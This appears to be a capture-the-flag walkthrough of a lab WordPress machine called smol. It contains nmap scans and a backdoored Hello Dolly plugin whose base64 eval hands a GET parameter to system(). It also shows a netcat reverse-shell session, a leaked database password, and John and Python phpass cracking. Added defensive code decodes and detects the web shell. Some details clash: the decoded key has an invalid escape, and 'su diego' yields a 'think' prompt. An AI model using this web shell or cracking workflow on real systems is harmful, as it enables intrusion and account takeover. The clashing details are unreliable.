```
nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:24 EST
Nmap scan report for 192.168.56.1
Host is up (0.00030s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00024s latency).
MAC Address: 08:00:27:4C:6C:28 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.16
Host is up (0.00031s latency).
MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
```
```
nmap -sT --min-rate 10000 -p- 192.168.56.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:25 EST
Nmap scan report for 192.168.56.16
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
```
```
nmap -sT -sV -A -T4 192.168.56.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:55 EST
Nmap scan report for www.smol.hmv (192.168.56.16)
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 6.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: AnotherCTF
MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   10.44 ms www.smol.hmv (192.168.56.16)
```
```
nmap --script=vuln -p- 192.168.56.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:27 EST
Nmap scan report for 192.168.56.16
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
```
```php
<?php
/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

function hello_dolly_get_lyric() {
	/** These are the lyrics to Hello Dolly */
	$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";

	// Here we split it into lines.
	$lyrics = explode( "\n", $lyrics );

	// And then randomly choose a line.
	return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
	// Injected backdoor, not part of the upstream plugin: decodes and eval()s a
	// snippet that hands a GET parameter straight to system().
	eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZtXDE0NCJdKTsgfSA='));
	$chosen = hello_dolly_get_lyric();

	$lang = '';
	if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
		$lang = ' lang="en"';
	}

	printf(
		'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
		__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
		$lang,
		$chosen
	);
}

// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph.
function dolly_css() {
	echo "
	<style type='text/css'>
	#dolly {
		float: right;
		padding: 5px 10px;
		margin: 0;
		font-size: 12px;
		line-height: 1.6666;
	}
	.rtl #dolly {
		float: left;
	}
	.block-editor-page #dolly {
		display: none;
	}
	@media screen and (max-width: 782px) {
		#dolly,
		.rtl #dolly {
			float: none;
			padding-left: 0;
			padding-right: 0;
		}
	}
	</style>
	";
}

add_action( 'admin_head', 'dolly_css' );
```
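To see what the eval(base64_decode(...)) line does without running it, here is an added Python example (not part of the original writeup or of the plugin). It finds eval(base64_decode('...')) calls in PHP source, decodes each payload, and resolves the octal (\143) and hex (\x64) escapes PHP honours inside double-quoted strings, so the obfuscated superglobal keys and the functions they feed become readable. The PLUGIN_SOURCE sample is constructed from the hello.php above with the base64 string copied verbatim; the regular expressions and function names are this example's own.

```python
import base64
import re

# Constructed sample: the backdoored hello_dolly() from the page, trimmed to the
# lines that matter. The base64 string is copied verbatim from the plugin above.
PLUGIN_SOURCE = r"""
function hello_dolly() {
    eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZtXDE0NCJdKTsgfSA='));
    $chosen = hello_dolly_get_lyric();
}
"""

# eval(base64_decode('<payload>')) with optional whitespace, single or double quotes.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)"
)
# Double-quoted keys of request superglobals, e.g. $_GET["\143\155\x64"].
REQUEST_KEY = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\[\s*"((?:[^"\\]|\\.)*)"\s*\]')
# PHP double-quoted string escapes: \ooo (1-3 octal digits) and \xhh (1-2 hex digits).
PHP_ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3})")
# Functions that hand a string to the OS or back to the PHP interpreter.
DANGEROUS_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
)


def php_unescape(s: str) -> str:
    """Resolve \\ooo and \\xhh escapes the way PHP does in a double-quoted string.

    A single substitution pass means a decoded byte is never re-read as the
    start of another escape.
    """
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return chr(int(esc, 8))

    return PHP_ESCAPE.sub(repl, s)


def decode_eval_payloads(php_source: str) -> list:
    """Return the decoded text of every eval(base64_decode('...')) in the source."""
    decoded = []
    for m in EVAL_B64.finditer(php_source):
        raw = base64.b64decode(m.group(1), validate=True)
        decoded.append(raw.decode("latin-1"))  # keep every byte, even non-UTF-8 junk
    return decoded


def audit(php_source: str) -> list:
    """Decode each hidden payload and report the request keys and calls it uses."""
    findings = []
    for code in decode_eval_payloads(php_source):
        findings.append({
            "decoded": code,
            "keys": [(sg, php_unescape(k)) for sg, k in REQUEST_KEY.findall(code)],
            "calls": DANGEROUS_CALL.findall(code),
        })
    return findings


if __name__ == "__main__":
    for f in audit(PLUGIN_SOURCE):
        print("decoded payload:", f["decoded"].strip())
        for superglobal, key in f["keys"]:
            print(f"  reads $_{superglobal}[{key!r}]")
        print("  dangerous calls:", ", ".join(f["calls"]))
```

Run against a whole wp-content/plugins tree, the same three regexes are a cheap first-pass detector for this family of dropped-in web shells; anything that eval()s decoded data and reads a request key deserves a manual look regardless of which plugin header sits above it.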
```
┌──(root㉿kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.56.4] from www.smol.hmv [192.168.56.16] 42818
bash: cannot set terminal process group (788): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smol:/var/www/wordpress/wp-admin$
```
```
www-data@smol:/var/www/wordpress/wp-admin$ mysql -u wpuser -p
mysql -u wpuser -p
Enter password: kbLSF2Vop#lw3rjDZ629*Z%G

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 61371
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```
The phpass hashes pulled from the WordPress database were then handed to John the Ripper; the wordlist attack cracked one of them, sandiegocalifornia.
```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia      (?)
```
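John labelled the hashes phpass with an iteration count of 8192. As an added example that is not part of the original writeup, the Python below implements the portable phpass scheme WordPress uses for $P$ hashes and checks candidate passwords against a hash the way a cracker does: the character after $P$ is log2 of the MD5 iteration count (so 'B', index 13 in phpass' alphabet, means 2^13 = 8192 rounds), the next eight characters are the salt, and the remaining 22 encode the final digest. The salt 'abcdefgh' in the demo is made up; the $P$9... hash for 'test12345' is the reference vector from the phpass test suite.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# phpass' own 64-character alphabet (not the standard base64 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes) -> str:
    """phpass' base64 variant: little-endian 3-byte groups, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_iterations(setting: str) -> int:
    """Iteration count encoded by the 4th character, e.g. '$P$B...' -> 8192."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    return 1 << count_log2


def _crypt_private(password: str, setting: str) -> str:
    """MD5(salt+pw), then MD5(prev+pw) repeated 2^cost times; mirrors phpass."""
    count = phpass_iterations(setting)
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)


def phpass_hash(password: str, salt: str, cost_char: str = "B") -> str:
    """Produce a $P$ hash with an explicit salt and cost (WordPress picks a random salt)."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the phpass alphabet")
    return _crypt_private(password, "$P$" + cost_char + salt)


def phpass_check(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    if len(stored) != 34:
        return False
    try:
        candidate = _crypt_private(password, stored)
    except ValueError:
        return False
    return hmac.compare_digest(candidate.encode(), stored.encode())


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Minimal wordlist attack: the loop john runs, 2^cost MD5 calls per candidate."""
    for word in wordlist:
        if phpass_check(word, stored):
            return word
    return None


if __name__ == "__main__":
    demo = phpass_hash("sandiegocalifornia", "abcdefgh", "B")  # made-up salt
    print(demo, "iterations:", phpass_iterations(demo))
    print("cracked:", crack(demo, ["password", "123456", "sandiegocalifornia"]))
```

The cost is why john reports the iteration count up front: at 8192 salted MD5 rounds per guess the hash is slow enough that only weak passwords fall to rockyou quickly, and every hash here carries a distinct salt, so candidates cannot be shared across users.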
Logging in over SSH with that password was the first idea, but the server asked for an SSH private key (it does not accept password authentication).

Switching users with su from the existing www-data shell worked instead; the password is valid for the diego account.
```
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia

System information as of Wed 05 Feb 2025 06:40:43 PM UTC

  System load:  0.06               Processes:                218
  Usage of /:   55.8% of 9.75GB    Users logged in:          0
  Memory usage: 35%                IPv4 address for enp0s17: 192.168.56.16
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

think@smol:~$
```
A wordpress.old.zip turned up in gege's home directory, but it is owned by root with group gege and mode -rwxr-x---, so the current user has no permission to read it.
```
think@smol:/home/gege$ ls -al
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip
```